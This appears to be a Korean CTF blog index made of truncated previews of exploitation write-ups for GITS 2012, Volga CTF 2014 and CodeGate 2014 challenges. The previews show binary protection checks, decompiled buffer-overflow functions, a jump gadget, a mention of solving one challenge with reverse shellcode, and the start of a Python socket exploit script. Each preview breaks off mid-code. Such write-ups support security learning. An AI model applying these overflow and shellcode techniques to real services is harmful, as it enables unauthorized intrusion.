GITS 2012 Pwnable 200Pts

~> file ./GITS2012_pwnable200
./GITS2012_pwnable200: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=c53d1dc1e47bd86dc63c9fba66f4a5c41cf2096d, stripped
~> checksec --file ./GITS2012_pwnable200
RELRO           STACK CANARY      NX            PIE             RPATH
Partial RELRO   No canary found   NX disabled   No PIE          N..
푸는데 5시간 정도 걸린 문제. 분명 그렇게 오래 걸리면 안 될 쉬운 문제인데 삽질 + 불운 + 귀찮음 덕분에 굉장히 오래 걸렸다.

# file exploit400
exploit400: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x105e30fbeade2b06f9d82a9ff924871db71cae3c, stripped
# checksec --file ./exploit400
RELRO           STACK CANARY      NX            PIE             RPATH
No RELRO        Canary found      NX enabled    No PI..
Volga CTF 2014 exploit300 12345678910111213141516171819202122232425# Location: /home/john/exploit300.py from sys import modulesmodules.clear()del modules _raw_input = raw_input_BaseException = BaseException_EOFError = EOFError # he-he__builtins__.__dict__.clear()__builtins__ = None print '>>> Just escape me...' while 1: try: d = { 'x' : None} exec 'x='+_raw_input()[:500] in d print 'ret:', d['x'..
문제를 맞히는 게임을 제공한다. 첫 번째 문제를 틀리면 두 번째 기회가 주어지는데, 그때 오버플로우가 일어난다. 12345678910111213141516171819202122232425262728293031323334int __cdecl vuln(int fd){ char buf_124; // [sp+14h] [bp-4B4h]@1 //size 124 char v3; // [sp+90h] [bp-438h]@4 char s2; // [sp+490h] [bp-38h]@4 int v5; // [sp+4B8h] [bp-10h]@1 int v6; // [sp+4BCh] [bp-Ch]@1 v6 = 0; v5 = 0; sques(fd, 1); v5 = recv(fd, &buf_124, 124u, 0); addn(&buf_124, ..
http://shell-storm.org/repo/CTF/CodeGate-2014/AngryDoraemon-250/ CodeGate 2014 문제를 다시 풀어봤다. Menu에서 4를 선택하면 나오는 MOUSE 부분에서 Overflow가 난다. 12345678910111213141516171819202122232425262728293031323334353637383940int __cdecl sub_8048FC6(int fd){ int v1; // edx@3 int v2; // ecx@3 int v3; // eax@4 size_t v4; // ST1C_4@4 int result; // eax@5 int v6; // [sp+18h] [bp-20h]@1 int buf; // [sp+22h] [bp-16h]@1 ..
JMP ESP 계열(레지스터 간접 점프) 가젯을 쓰면 된다. 다만 아래 objdump 출력의 0x80483dc 가젯은 `ff e7`, 즉 `jmp *%edi`이지 `jmp *%esp`가 아니므로, 점프 시점에 EDI가 쉘코드(버퍼) 주소를 가리키는지 확인하고 써야 한다. 내 서버가 없어서 친구 서버를 빌려 Reverse Shellcode로 풀었다. 123080483dc : 80483dc: 8d 7f 06 lea 0x6(%edi),%edi 80483df: ff e7 jmp *%edics 1234567891011121314151617181920212223242526272829303132333435363738#!/usr/bin/env python#-*-coding:utf8-*-from socket import *from struct import * p = lambda x : pack("